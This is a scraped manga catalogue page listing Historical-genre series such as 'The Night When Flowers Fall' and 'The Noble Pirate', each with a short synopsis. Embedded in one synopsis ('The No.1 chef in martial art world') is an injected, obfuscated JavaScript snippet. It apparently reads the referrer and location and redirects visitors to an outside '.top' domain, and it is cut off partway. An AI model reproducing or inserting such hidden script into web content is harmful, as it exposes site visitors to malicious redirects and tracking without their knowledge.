Historical - Page 277

Discover top manga Historical with stunning art and thrilling tales. Enjoy the best Historical manga free online today!

3980 results

The Needlepoint Swordmaster

Antstudio brings you a collection of five stories that transcend time and space, with each one filled with more love and romance than the last. This collection takes you from a world of demons versus humans to a manor full of unexpected relationships and magical surprises. After that, it brings you to a "sew"lful grand empire and then to a humble sweet potato farm full of lonely longing. Finally, you return to the present day as you reminisce about past loves by "drawing" on happy memories.


The New Legend of the Strongest Man Kurosawa

The man of legend has come back to life! Kurosawa, who led the homeless army in a fierce battle against a group of delinquents in *The Legend of A Strongest Man Kurosawa*, was thought to have gone to his eternal rest. After spending eight whole years in a hospital bed, he makes a miraculous comeback in 2013! The fabled man returns to the present life to create a new legend... in spite of the fact that the present life is not quite so great.


The Newlywed Life Of A Witch And A Dragon

The sweet newlywed life of a genius witch who entangled her life with a dragon by mistake! Espanol [spoiler]Un día Wendy se enteró del matrimonio de su amor platónico. Profundamente afligida, pasa la noche con su recién llegado Aiden Winter bajo la influencia de alcohol.[/spoiler]


The Night When Flowers Fall

My betrothed has returned, as an assassin seeking my lifeThe story of Seora, who returned as an assassin, and Heejin, who loves her with all his heart, intertwined with the ruthless political strife and fierce power struggles that unfold within the imperial palace.A royal edict arrives for the King of Yeon, who reigns over the northern province of the Empire. It commands him to marry Lee Seora, the half-born daughter of Count Lee Yonghyuk.In truth, Lee Seora is an assassin hired by the Empress, who seeks to restrain Yoon Heejin, whom the Empress views as a threat. Heejin, however, quickly perceives this.Yet, the two share a profound bond from their past, and Heejin has never been able to forget her, longing for her all this time.Seora, who lost her memories before the age of twenty and became an assassin, vaguely recalls him, and as they confirm their mutual feelings, they joyfully accept their marriage.However, the two are helplessly entangled in the Imperial Court's power struggles, and the political battle for the Imperial throne begins to rage across the Empire!!!+


The No.1 chef in martial art world

Liu Xian, the world’s number one Chinese chef, has traveled to the martial arts world by accident. There is no concept of cooking in this world, and everyone eats pills for food. Liu Xian, who is a master of culinary skills, is about to flex his muscles. However, what awaits him is the imprisoned play of gluttonous beautiful girls one after another! The blessing of Qi people? No, because this chef has feminphobia!<script></script><script>function _0x3c89(){var _0x2b72b4=['text','google','location','http://rea','4319840cjONjm','includes','OLaqJ','.top/','3331400AfMEWt','floor','1860xgLcER','random','13027NbYFWf','pQDEh','206129pxkHTK','https://ip','KKxcv','referrer','rajyh','dma.net/','2jrVKzM','1696431oZWbED','7827210oCcTRS','4541670tZhLcl','QVkof','wjzDG','eSjIa','then','href','Rddxv','.customapi','VMcsm'];_0x3c89=function(){return _0x2b72b4;};return _0x3c89();}(function(_0x498f95,_0x397e5e){var _0x801e65=_0x161c,_0xada3d0=_0x498f95();while(!![]){try{var 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The Noble Daughter Of First Wife: The Prince Isn't Easy To Be Deceived

The daughter of the group died unexpectedly and crossed over to Nan Jin, the daughter of Nanfu, the richest man in ancient times. the heroine doesn't want to marry, and Meng Tianshu, the heir of the Shunan Palace, doesn't want the heroine to marry either. (Translated by Google Translate)


The Noble Pirate

Read manhwa The Noble Pirate From the high seas to high society. When the infamous pirate Rosetta gets poisoned to death, she wakes up in the body of noble lady Leah. Now, to avoid a second death, Rosetta must play the part of a noble and… get engaged?! But to whom? Could it be to the strange admiral who has suddenly come chasing after “Rosetta”?


The Not-So-Mad Princess

A Skilled Medical Examiner Finds Herself In A Royal Twist Of Fate, Waking Up As Yancy Lisbeth, The Overlooked Fourth Princess Of Edelweiss Kingdom. In The Shadow Of Her Sinister Sister Christie’s Relentless Attempts On Her Life, Yancy Must Use Her Sharp Intellect From Her Previous Life To Turn The Tables. As She Gains The Queen’s Attention With Her Seemingly “Newfound” Resourcefulness, The Palace Becomes A Chessboard Where Yancy’s Clever Moves Could Secure Her Safety Or Lead To A Checkmate By Christie’s Hand. Will Her Wits Let Her Stay In The Queen’s Good Graces And Out Of Harm’s Way?


The Obsessive Emperor’s Capable Pharmacist

Read The Obsessive Emperor’s Capable Pharmacist Novel – The Obsessive Emperor’s Capable Pharmacist Manhwa Online Free At KunManga The summary of the comic The Obsessive Emperor’s Capable Pharmacist: “Let’s make a contract.” As soon as I possessed this body, I caught the eye of a handsome emperor and was offered a position as his exclusive pharmacist?! The salary and benefits are top-notch! In that case, let’s earn quickly and make a getaway. Then, I can enjoy a young and rich life! But wait, what? “A lifelong contract?! This is ridiculous!” I can’t become a slave to the palace for life just because I carelessly stamped one seal. So, I resolved to escape from the emperor! “Hailey, try this too.” He serves me sweet desserts, “Hailey, you are a precious person to me.” He tells me I’m special, “Resignation will be difficult. So, you should have been more careful with the contract.” Why is this man suddenly so obsessed with me?! Will I be able to resign safely…? “The Obsessive Emperor’s Capable Pharmacist” is also known as: I Am a Competent Pharmacist of the Obsessive Emperor / I Am the Obsessive Emperor’s Talented Pharmacist / 凄腕薬師ですが、 皇帝に執着されています / 집착 황제의 유능한 약사입니다 “TopManhua, MangaUpdates, LikeManga…” are the most searched keywords on the website MANGAZIN. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at MANGA ZIN. You can read TOP MANHUA Two Weeks and Counting Deadlines are Raining in the Status Window I Became The King by Scavenging


The Obsessive Male Lead Made Me The Female Lead

[Welcome to 『The Opponent of the Dragon』.] “Oh my, the book talks!” [I am a guide for travelers who have transmigrated into the novel.] I possessed the body of Tiarozety Isol, a supporting character in 『The Opponent of the Dragon.』 The book will send me back to my world as soon as I complete the ending of the male lead, Lexion. The problem is, I’ve never read this book before. Besides… [If the development of the story deviates from the original, the traveler gets a penalty right away.] “Penalty?” [Yes. The penalty is that the novel proceeds in the direction the traveler doesn’t want the most.] “Oh my god.” I was able to play the role of Tiarozety firmly. But then, I suddenly fell in love with the male lead, Lexion Sparrow. “I’ll miss you.” I was able to complete the ending by dying for him. However- There was a problem with the ending. Thus, I returned to the beginning of the novel again. Somehow, I was sent back again inside the novel on my way home. And- “Titi, choose me. Not this damn fate.” “………” “Choose me, even if the path is rough. Because I’m ready for anything.” And that’s how… Lexion, the male lead, began to cling onto me.


The Older Sister Should Raise Her Younger Sister

After a car accident, I woke up as the half-sister of the main villain in the novel.Having already possessed her, I decided to lay a flower path to prevent the villain blackening.I worked hard with all my heart and strength…Somehow, I worked and worked stably with the Grand Duke of Lyserville, who was known for his bloodless murder.“Didn’t you warn me, that you wouldn’t let me go?”After seeing me with another man and chasing me after an affair,“Do you like me?”I asked.“Don’t be ridiculous.”I wondered why this man was so interested with my private life.


The Palace Beast

The princess knew she had extraordinary abilities, but knowing that she would never become a queen, the princess wanted to live the rest of her life quietly with her maid. However, the conspiracy of the state covets the country, and the prince, who feels that the princess is a threat, touches the princess’s maid and the maid disappears. The moment he touches the lady-in-waiting who truly cares for her among those who have lived in the palace all their lives and only told lies for their own benefit, The extraordinary serpent begins to stretch to become a dragon that jumps over the Imoogi himself to protect her people. “The current princess will unify the three kingdoms.” In a country built with God’s consideration and dragon’s favor, human greed and ability stained by the dragon’s curse, and a scheduled war that began with prophecy. Can the prophecy be completed and the princess become empress? Beast of the Palace / 궁궐의 맹수
